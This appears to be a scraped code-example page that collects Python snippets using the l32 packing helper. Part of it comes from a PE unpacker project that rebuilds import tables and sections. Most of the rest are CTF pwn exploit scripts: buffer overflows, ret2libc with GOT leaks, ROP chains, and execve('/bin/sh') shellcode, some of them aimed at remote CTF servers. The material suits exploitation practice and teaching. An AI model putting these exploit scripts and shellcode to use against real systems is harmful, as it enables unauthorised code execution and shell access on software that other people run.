コード例 #1
0
ファイル: rebuildiat.py プロジェクト: MatrixLing/autounpacker
def modify_iat_data_directory(in_data, iat_rva, number_of_dll):
    #dos_header_pointer = 0
    nt_header_pointer = l32(in_data[0x3c:0x40])
    data_directory_pointer = nt_header_pointer + 0x78
    iat_pointer = data_directory_pointer + 8
    iat_size = 0x14*(number_of_dll + 1)
    in_data = in_data[0:iat_pointer]+ l32(iat_rva)+l32(iat_size)+in_data[iat_pointer+8:]
    return in_data
コード例 #2
0
ファイル: rebuildiat.py プロジェクト: MatrixLing/autounpacker
def build_import_descriptor(original_first_thunk, name, first_thunk):
    time_date_stamp = 0 #可以忽略
    forwarder_chain = 0 #一般为0

    import_descriptor = l32(original_first_thunk) + l32(time_date_stamp) + l32(forwarder_chain)
    import_descriptor += l32(name) + l32(first_thunk)

    return import_descriptor
コード例 #3
0
ファイル: exploit.py プロジェクト: zihuocc/PwnMe
def main():
    junk = "A" * 62
    systemAddr = zio.l32(0xb7eee980 - (0x000d5980 - 0x0003ada0))
    exitAddr = "BBBB"
    payload = junk + systemAddr + exitAddr + zio.l32(0xbffff869 + 6)
    Io = zio.zio("./c5")
    Io.write(payload)
    Io.interact()
コード例 #4
0
def parse_section(data, section_pointer, number_of_section):
    log('parse section:'+hex(section_pointer)+':'+hex(number_of_section))
    section_infos = []
    for i in range(number_of_section):
        rva_size = l32(data[section_pointer+i*0x28+8:section_pointer+i*0x28+0xc])
        rva = l32(data[section_pointer+i*0x28+0xc:section_pointer+i*0x28+0x10])
        file_size = l32(data[section_pointer+i*0x28+0x10:section_pointer+i*0x28+0x14])
        file_offset = l32(data[section_pointer+i*0x28+0x14:section_pointer+i*0x28+0x18])
        section_infos.append((rva_size,  rva, file_size, file_offset))
    return section_infos
コード例 #5
0
ファイル: rebuildiat.py プロジェクト: MatrixLing/autounpacker
def add_a_dll(dll_name, thunk_data_pointer, name_pointer, func_list, data, iat_rva):
    thunk_data = ""
    for func in func_list:
        if not func.startswith('#'):
            func_name = build_import_by_name(func)
            thunk_data += l32(iat_rva + name_pointer)
            (data, name_pointer) = set_iat_name(data, func_name, name_pointer)
        else:
            index = int(func.strip('#'), 10)
            thunk_data += l32(0x80000000+index)
    thunk_data += l32(0)
    data = set_iat_data(data, thunk_data_pointer, thunk_data)
    return (data, name_pointer, thunk_data)
コード例 #6
0
ファイル: modifyoep.py プロジェクト: MatrixLing/autounpacker
def modify_oep(infile, outfile, oep):
    f = open(infile, "rb")
    data = f.read()
    f.close()

    nt_header_pointer = l32(data[0x3C:0x40])
    address_of_entry_point_pointer = nt_header_pointer + 0x28

    data = data[0:address_of_entry_point_pointer] + l32(oep) + data[address_of_entry_point_pointer + 4 :]

    f = open(outfile, "wb")
    f.write(data)
    f.close()
コード例 #7
0
ファイル: addsection.py プロジェクト: MatrixLing/autounpacker
def add_pe_section(infile, outfile,  name,  virtual_size, virtual_address, size_of_raw_data, pointer_to_raw_data, characteristics):
    log('add pe section:'+name+':'+hex(virtual_address)+':'+hex(pointer_to_raw_data))
    name = name.ljust(8, '\x00')
    pointer_to_relocation = 0 #在obj文件中使用,重定位的偏移
    pointer_to_line_numbers = 0 #在符号表的偏移(供调试用)
    number_of_relocations = 0 #在obj文件中使用,重定位项的数目
    number_of_line_number = 0   #行号表中行号的数目


    new_section = name + l32(virtual_size) + l32(virtual_address) + l32(size_of_raw_data)
    new_section += l32(pointer_to_raw_data) + l32(pointer_to_relocation) + l32(pointer_to_line_numbers)
    new_section += l16(number_of_relocations) + l16(number_of_line_number) + l32(characteristics)

    f = open(infile, 'rb')
    data = f.read()
    f.close()

    index = get_new_section_pointer(data)

    dos_header_pointer = 0
    dos_header_e_lfanew_offset = 0x3c
    nt_header_pointer =  l32(data[dos_header_e_lfanew_offset:dos_header_e_lfanew_offset+0x4])
    nt_header_file_header_offset = 4

    file_header_pointer = nt_header_pointer + nt_header_file_header_offset
    file_header_number_of_section_offset = 2

    number_of_section_pointer = file_header_pointer + file_header_number_of_section_offset

    size_of_image_pointer = nt_header_pointer + 0x50

    if len(data) < pointer_to_raw_data:
        data = data.ljust(pointer_to_raw_data + size_of_raw_data, '\x61')
    elif len(data) < pointer_to_raw_data + size_of_raw_data:
        data = data[0:pointer_to_raw_data].ljust(pointer_to_raw_data + size_of_raw_data, '\x61')
    else:
        data = data[0:pointer_to_raw_data] + '\x61'*size_of_raw_data + data[pointer_to_raw_data+size_of_raw_data:]


    data = data[0:index] + new_section + data[index+len(new_section):]
    #add number of sections
    #print hex(number_of_section_pointer)
    old_number_of_section = l16(data[number_of_section_pointer:number_of_section_pointer+2])
    #print hex(old_number_of_section)
    data = data[0:number_of_section_pointer] + l16(old_number_of_section+1) + data[number_of_section_pointer+2:]

    #modify sizeofimage
    new_size_of_image = virtual_address + virtual_size
    data = data[0:size_of_image_pointer] + l32(new_size_of_image) + data[size_of_image_pointer+4:]

    f = open(outfile, 'wb')
    f.write(data)
    f.close()
コード例 #8
0
ファイル: addsection.py プロジェクト: MatrixLing/autounpacker
def get_new_section_pointer(data):
    nt_header_pointer = l32(data[0x3c:0x40])
    size_of_optional_header_pointer = nt_header_pointer + 0x14
    section_pointer = nt_header_pointer+0x18+l16(data[size_of_optional_header_pointer:size_of_optional_header_pointer+2])
    number_of_section_pointer = nt_header_pointer + 6
    number_of_section = l16(data[number_of_section_pointer:number_of_section_pointer+2])
    return section_pointer + 0x28*number_of_section
コード例 #9
0
def generate_section_info_from_data(data):
    nt_header_pointer = l32(data[0x3c:0x40])
    size_of_optional_header_pointer = nt_header_pointer + 0x14
    section_pointer = nt_header_pointer+0x18+l16(data[size_of_optional_header_pointer:size_of_optional_header_pointer+2])
    number_of_section_pointer = nt_header_pointer + 6
    number_of_section = l16(data[number_of_section_pointer:number_of_section_pointer+2])
    section_infos = parse_section(data, section_pointer, number_of_section)
    return section_infos
コード例 #10
0
ファイル: dumppe.py プロジェクト: MatrixLing/autounpacker
def build_a_section(name, size, offset, characteristics):
    log('build_a_section:'+hex(size)+':'+hex(offset)+":"+hex(characteristics))
    name = name.ljust(8, '\x00')
    new_section = name + l32(size) + l32(offset) + l32(size)
    new_section += l32(offset) + l32(0) + l32(0)
    new_section += l16(0) + l16(0) + l32(characteristics)
    return new_section
コード例 #11
0
ファイル: myDynELF.py プロジェクト: jinyu00/pwnable
 def __find_dyn_section(self, phdr, elf_base, leak):
     if self.BITS == 64:
         phdr_ent = phdr
         while True:
             garbage = l32(leak(phdr_ent, 0x4))
             # p_type of dynamic segment is 0x2
             if garbage == 0x2:
                 break
             phdr_ent += 0x38
         dyn_section = l64(leak(phdr_ent + 0x10, 0x8)) + elf_base
         print '[+] .dynamic section headers table\t:\t0x%x' % dyn_section
         return dyn_section
コード例 #12
0
ファイル: myDynELF.py プロジェクト: jinyu00/pwnable
 def __find_func_adr(self, dt_sym_tab, dt_str_tab, func, elf_base, leak):
     if self.BITS == 64:
         sym_ent = dt_sym_tab
         while True:
             garbage = l32(leak(sym_ent, 0x4))
             name = leak(dt_str_tab + garbage, len(func))
             if name == func:
                 break
             sym_ent += 0x18
         adr_func = l64(leak(sym_ent + 0x8, 0x8)) + elf_base
         print '[+] %s loaded address\t:\t0x%x' % (func, adr_func)
         return adr_func
コード例 #13
0
def normal():
    global distance
    global shellcode
    global junk
    Io = zio.zio("./vulnerable")
    line = Io.readline()  # 接受到的数据为 : What's this:0xffe36e40?
    address_number = int(line[len("What's this:"):-2], 16)  # 程序运行之后才可以得到
    address = zio.l32(address_number)
    print "[address] : [%s]" % (hex(address_number)[0:-1])
    payload = shellcode + junk + address
    Io.write(payload)
    Io.interact()
コード例 #14
0
def brute(address_number):
    global distance
    global shellcode
    global junk
    Io = zio.zio("./vulnerable")
    address_real = int(Io.readline()[len("What's this:"):-2],
                       16)  # 程序运行之后才可以得到
    print "[Real] : [%s]" % (hex(address_real)[0:-1])
    address = zio.l32(address_number)
    payload = shellcode + junk + address
    Io.write(payload)
    Io.interact()
コード例 #15
0
ファイル: dumppe.py プロジェクト: MatrixLing/autounpacker
def rebuild_section(data, map_info):
    def set_data(data, index, value):
        return data[0:index]+value+data[index+len(value):]
    nt_header_pointer = l32(data[0x3c:0x40])
    size_of_optional_header_pointer = nt_header_pointer + 0x14
    section_pointer = nt_header_pointer+0x18+l16(data[size_of_optional_header_pointer:size_of_optional_header_pointer+2])
    number_of_section_pointer = nt_header_pointer + 6

    data = set_data(data, number_of_section_pointer, l32(len(map_info)))

    index = 0
    for map in map_info:
        offset = map[0]
        size = map[1]
        character = map[2]
        #log('offset='+hex(offset)+';size='+hex(size)+';character='+hex(character))
        name = str(index)
        section = build_a_section(name, size, offset, character)
        data = set_data(data, section_pointer+0x28*index, section)
        index += 1

    return data
コード例 #16
0
ファイル: iatconf.py プロジェクト: MatrixLing/autounpacker
def generate_conf(dbg, conffile, base, iat_addr, iat_size):
    log("enter generateconf:"+hex(iat_addr)+':'+hex(iat_size))
    f = open(conffile, 'wb')

    iat_mem = dbg.read_process_memory(base + iat_addr, iat_size)

    modules = dbg.enumerate_modules()
    #print_module_info(modules)

    cur_module = None
    export_info = {}

    for i in range(iat_size/4):
        fun_addr = l32(iat_mem[i*4:i*4+4])
        #log('fun_addr:%08x' %fun_addr)
        if fun_addr == 0:
            cur_module = None
            continue
        if cur_module is None:
            cur_module = get_module(fun_addr, modules)
            if cur_module == None:
                continue
            export_info = generate_export_info(cur_module[3])
            f.write('['+cur_module[0]+']\n')

        temp_module = get_module(fun_addr, modules)

        if temp_module == None:
            cur_module = None
        if get_module(fun_addr, modules)[1] == cur_module[1]:
            fun_name = get_fun_name(fun_addr-cur_module[1], export_info)
            f.write(hex(iat_addr+i*4)+' '+cur_module[0]+'.'+fun_name+'\n')
        else:
            cur_module = temp_module
            export_info = generate_export_info(cur_module[3])
            f.write('['+cur_module[0]+']\n')
            fun_name = get_fun_name(fun_addr-cur_module[1], export_info)
            f.write(hex(iat_addr+i*4)+' '+cur_module[0]+'.'+fun_name+'\n')

    f.close()
コード例 #17
0
ファイル: dumppe.py プロジェクト: MatrixLing/autounpacker
def fix_pe_section(data):
    log('fix_pe_section')
    def set_data(data, index, value):
        return data[0:index]+value+data[index+len(value):]
    nt_header_pointer = l32(data[0x3c:0x40])
    size_of_optional_header_pointer = nt_header_pointer + 0x14
    section_pointer = nt_header_pointer+0x18+l16(data[size_of_optional_header_pointer:size_of_optional_header_pointer+2])
    number_of_section_pointer = nt_header_pointer + 6
    number_of_section = l16(data[number_of_section_pointer:number_of_section_pointer+2])

    for i in range(number_of_section):
        rva_size = l32(data[section_pointer+i*0x28+8:section_pointer+i*0x28+0xc])
        rva = l32(data[section_pointer+i*0x28+0xc:section_pointer+i*0x28+0x10])
        file_size = l32(data[section_pointer+i*0x28+0x10:section_pointer+i*0x28+0x14])
        file_offset = l32(data[section_pointer+i*0x28+0x14:section_pointer+i*0x28+0x18])
        if file_size < rva_size: #.bss ?? to do
            #print 'fix file_size:'+hex(rva_size)
            data = set_data(data, section_pointer+i*0x28+0x10, l32(rva_size))
    return data
コード例 #18
0
#!/usr/bin/env python
# encoding:utf-8

import zio

payloadForStep1 = "A" * 7 + "\x00"  # 使用 0x00 绕过 strlen()
payloadForStep1 += "@" * 8  #
payloadForStep1 += zio.l32(0x804871e)  # Step1() 的地址
payloadForStep1 += zio.l32(0x804867d)  # main() 的地址
payloadForStep1 += "\x00" * 4  # Step1 的参数3
payloadForStep1 += "AAAA"  # Step1 的参数2
#payloadForStep1 +=  "\xd5\xc4\xb3\xa2" # Step1 的参数 1
payloadForStep1 += zio.l32(0xA2B3C4D5)  # Step1 的参数 1

payloadForStep2 = "A" * 7 + "\x00"  # 使用 0x00 绕过 strlen()
payloadForStep2 += "@" * 8  #
payloadForStep2 += zio.l32(0x8048766)  # Step2() 的地址
payloadForStep2 += zio.l32(0x804867d)  # main() 的地址
payloadForStep2 += zio.l32(0xFF25A7D4)  # Step2 的参数 1
payloadForStep2 += "AAAA"  # Step2 的参数2

payloadForStep3 = "A" * 7 + "\x00"  # 使用 0x00 绕过 strlen()
payloadForStep3 += "@" * 8  #
payloadForStep3 += zio.l32(0x80487A3)  # Step3() 的地址
payloadForStep3 += zio.l32(0x804867d)  # main() 的地址
payloadForStep3 += zio.l32(0xFFFFFFFF)  # Step3 的参数 1
payloadForStep3 += zio.l32(0xC0C0C0C)  # Step3 的参数2
payloadForStep3 += zio.l32(0x9A829A82)  # Step3 的参数3

Io = zio.zio("./rop_rop_rop")
コード例 #19
0
ファイル: exploit_86.py プロジェクト: zihuocc/PwnMe
#!/usr/bin/env python
# encoding:utf-8

import zio
import binascii

address = zio.l32(
    0x804a00c)  # read() 函数在 got 表中的保存的位置 , 通过 objdump -d | grep "read" 得到

Io = zio.zio("./bingo_86")
Io.readline()
Io.write(address)
result = Io.readline()
read_address = int(result.replace("result: ", "")[2:-1], 16)

# 根据公式 :
# read_address - read_lib_address = function_address - function_libc_address
# function_address = read_address - read_libc_address + function_libc_address

# libc 中的地址可以通过 : readelf -a libc.so.6_x86 | grep " function_name@" 获得
# sun@sun:~/pwnme/lessons/7hxzz/yao/2$ readelf -a libc.so.6_x86 | grep " read@"
#   958: 000d5980   101 FUNC    WEAK   DEFAULT   13 read@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/7hxzz/yao/2$ readelf -a libc.so.6_x86 | grep " exit@"
#   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
# sun@sun:~/pwnme/lessons/7hxzz/yao/2$ readelf -a libc.so.6_x86 | grep " system@"
#  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

read_libc_address = 0x000D5980
system_libc_address = 0x0003ADA0
exit_libc_address = 0x0002E9D0
コード例 #20
0
ファイル: exploit.py プロジェクト: zihuocc/PwnMe
def getAddress():
    address = zio.l32(0xbffff630 + 0x30)
    return address
コード例 #21
0
ファイル: attack.py プロジェクト: zhoucj93/ctf
TARGET = ('119.254.101.197', 10001)
LEN_TO_RET = 0x9c
PUTS_PLT = 0x08048530
PUTS_GOT = 0x08049de8
RESTART_ADDR = 0x08048590
PUTS_LIBC = 0x00065650
SYSTEM_LIBC = 0x00040190
BINSH_LIBC = 0x00160A24

# TARGET = ('10.211.55.32', 8888)

io = zio.zio(TARGET)
io.read_until_timeout()
payload = 'http://%\x001'
payload += NOPS(LEN_TO_RET - 8)
payload += zio.l32(PUTS_PLT) + zio.l32(RESTART_ADDR) + zio.l32(PUTS_GOT)
io.writeline(payload)
io.read_until('Decode Result:')
io.readline()

puts_addr = zio.l32(io.read(4))
print hex(puts_addr)
libc_addr = puts_addr - PUTS_LIBC
system_addr = libc_addr + SYSTEM_LIBC
binsh_addr = libc_addr + BINSH_LIBC

io.read_until_timeout()
payload = 'http://%\x001'
payload += NOPS(LEN_TO_RET - 8)
payload += zio.l32(system_addr) + zio.l32(RESTART_ADDR) + zio.l32(binsh_addr)
io.writeline(payload)
コード例 #22
0
ファイル: attack.py プロジェクト: enderdzz/CTF
LEN_TO_RET = 0x9c
PUTS_PLT = 0x08048530
PUTS_GOT = 0x08049de8
RESTART_ADDR = 0x08048590
PUTS_LIBC = 0x00065650
SYSTEM_LIBC = 0x00040190
BINSH_LIBC = 0x00160A24


# TARGET = ('10.211.55.32', 8888)

io = zio.zio(TARGET)
io.read_until_timeout()
payload = 'http://%\x001'
payload += NOPS(LEN_TO_RET - 8)
payload += zio.l32(PUTS_PLT) + zio.l32(RESTART_ADDR) + zio.l32(PUTS_GOT)
io.writeline(payload)
io.read_until('Decode Result:')
io.readline()

puts_addr = zio.l32(io.read(4))
print hex(puts_addr)
libc_addr = puts_addr - PUTS_LIBC
system_addr = libc_addr + SYSTEM_LIBC
binsh_addr = libc_addr + BINSH_LIBC

io.read_until_timeout()
payload = 'http://%\x001'
payload += NOPS(LEN_TO_RET - 8)
payload += zio.l32(system_addr) + zio.l32(RESTART_ADDR) + zio.l32(binsh_addr)
io.writeline(payload)
コード例 #23
0
ファイル: exploit_call_system.py プロジェクト: zihuocc/PwnMe
#!/usr/bin/env python
# encoding:utf-8

import zio

payload = "A" * 7 + "\x00" # 使用 0x00 绕过 strlen()
payload += "@" * 8 # 
payload += zio.l32(0x80485F2) # GetUserInput() 的地址
payload += zio.l32(0x8048480) # GetUserInput() 的返回地址 , 也就是 system 函数的地址
payload += zio.l32(0x804A04C) # GetUserInput() 的参数 (在内存中找一段可写的地址 , 用来存放 /bin/sh 这个字符串)
payload += zio.l32(0x804A04C) # system() 函数的参数 , 为 /bin/sh 这个字符串的地址

Io = zio.zio("./rop_rop_rop")
Io.writeline(payload)
Io.readline()
Io.writeline("/bin/sh")
Io.interact()
コード例 #24
0
    for i in range(size):
        result += chr(ord("A") + i) * 4
    result += "@" * 4
    return result[0:length]


def cut(payload, mark):
    temp = zio.l32(mark)
    return payload.split(temp)[0]


def cover(shellcode, payload):
    return (shellcode + payload)[0:len(payload)]


shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"

payload = junk(128)
payload = cut(payload, 0x51515050)
payload = cover(shellcode, payload)

Io = zio.zio("./bingo_86")

content = Io.readline()
address = zio.l32(int(content.replace("I am at ", "")[2:-1], 16))
print binascii.b2a_hex(address)
payload = payload + address

Io.write(payload)
Io.interact()
コード例 #25
0
def cut(payload, mark):
    temp = zio.l32(mark)
    return payload.split(temp)[0]
コード例 #26
0
#!/usr/bin/env python
# encoding:utf-8

import zio

payload = "A" * 0x88 + "BBBB"
payload += zio.l32(0x8048320)  # system() 函数的地址
payload += "\x00" * 4
payload += zio.l32(0x804A024)  # "/bin/sh" 的地址

# Io = zio.zio("./level2")
Io = zio.zio(("pwn2.jarvisoj.com", 9878))
Io.write(payload)
Io.interact()
コード例 #27
0
ファイル: solve.py プロジェクト: zhoucj93/ctf
def judge(s):
    print '====', s[:100], '===='
    if s.startswith('                    .----.'):
        return 'peanuts'
    if s.startswith('quu..__'):
        return 'pikachu'
    if s.startswith('\n                     Tb.'):
        return 'batman'
    if s.startswith('                 .88888888:.'):
        return 'linux'
    if s.startswith('               .=.,'):
        return 'superman'


io = zio.zio(TARGET)
s = io.read_until_timeout()

# io.writeline('A' * LEN_TO_RET + zio.l32(PUTS_PLT) + 'A' * 4 + zio.l32(PUTS_PLT))
io.writeline('A' * LEN_TO_RET + zio.l32(READ_FILE) + 'A' * 4 +
             zio.l32(STR_ADDR))
io.read_until('Bad luck!\n')

for i in xrange(5):
    s = io.read_until_timeout()
    io.writeline(judge(s))
    io.read_until('Hey you are so smart!\n')

# io.writeline('/bin/sh')
io.writeline('flag')
io.read_until_timeout()
コード例 #28
0
ファイル: exploit_86.py プロジェクト: zihuocc/PwnMe
#!/usr/bin/env python
# encoding:utf-8

import zio
import binascii


def junk(length):
    result = ""
    size = int(length / 4.0)
    for i in range(size):
        result += chr(ord("A") + i) * 4
    result += "@" * 4
    return result[0:length]


def cut(payload, mark):
    temp = zio.l32(mark)
    return payload.split(temp)[0]


address = zio.l32(0x804849d)
payload = junk(128)
payload = cut(payload, 0x47474646)
payload = payload + address

Io = zio.zio("./bingo_86")
Io.write(payload)
Io.interact()
コード例 #29
0
ファイル: solve.py プロジェクト: enderdzz/CTF
# TARGET = ('10.211.55.32', 8888)

def judge(s):
    print '====', s[:100], '===='
    if s.startswith('                    .----.'):
        return 'peanuts'
    if s.startswith('quu..__'):
        return 'pikachu'
    if s.startswith('\n                     Tb.'):
        return 'batman'
    if s.startswith('                 .88888888:.'):
        return 'linux'
    if s.startswith('               .=.,'):
        return 'superman'

io = zio.zio(TARGET)
s = io.read_until_timeout()

# io.writeline('A' * LEN_TO_RET + zio.l32(PUTS_PLT) + 'A' * 4 + zio.l32(PUTS_PLT))
io.writeline('A' * LEN_TO_RET + zio.l32(READ_FILE) + 'A' * 4 + zio.l32(STR_ADDR))
io.read_until('Bad luck!\n')

for i in xrange(5):
    s = io.read_until_timeout()
    io.writeline(judge(s))
    io.read_until('Hey you are so smart!\n')

# io.writeline('/bin/sh')
io.writeline('flag')
io.read_until_timeout()
コード例 #30
0
#!/usr/bin/env python
# encoding:utf-8

import zio

payload = "A" * 0x40 + zio.l32(0x1234)

# Io = zio.zio("./stack0")
Io = zio.zio("./test")
Io.writeline(payload)
Io.interact()
コード例 #31
0
ファイル: exploit.py プロジェクト: zihuocc/PwnMe
#!/usr/bin/env python
# encoding:utf-8

import zio

Io = zio.zio("./test")
# Io = zio.zio(("115.28.79.166", 5555))
Io.read_line()
payload = "AAAA"
Io.writeline(payload)
Io.read_line()
payload = "A" * 8 + zio.l32(1926)
Io.writeline(payload)
Io.interact()
コード例 #32
0
ファイル: temp.py プロジェクト: zihuocc/PwnMe
import zio

junk = "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Io = zio.zio("./main")
address = zio.l32(int(Io.readline().replace("Address : 0x", "")[0:8], 16))
payload = (shellcode + junk)[0:len(junk)] + address
Io.interact()